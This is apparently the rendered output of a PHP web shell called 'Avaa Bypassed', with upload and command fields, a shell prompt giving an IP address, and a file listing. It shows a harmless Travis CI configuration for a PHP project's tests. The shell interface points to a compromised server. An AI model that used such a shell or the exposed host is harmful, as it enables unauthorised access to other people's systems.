404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.134.86.4: ~ $
language: php

php:
    - 5.4
    - 5.5
    - 5.6
    - 7
    - hhvm

before_install:
    - export PATH=$HOME/.local/bin:$PATH
    - pip install --user autobahntestsuite
    - pip list --user autobahntestsuite

before_script:
    - composer install
    - sh tests/ab/run_ab_tests.sh

script:
    - vendor/bin/phpunit

Filemanager

Name Type Size Permission Actions
src Folder 0755
tests Folder 0755
.gitignore File 46 B 0644
.travis.yml File 317 B 0644
LICENSE File 1.04 KB 0644
README.md File 761 B 0644
composer.json File 872 B 0644
phpunit.xml.dist File 676 B 0644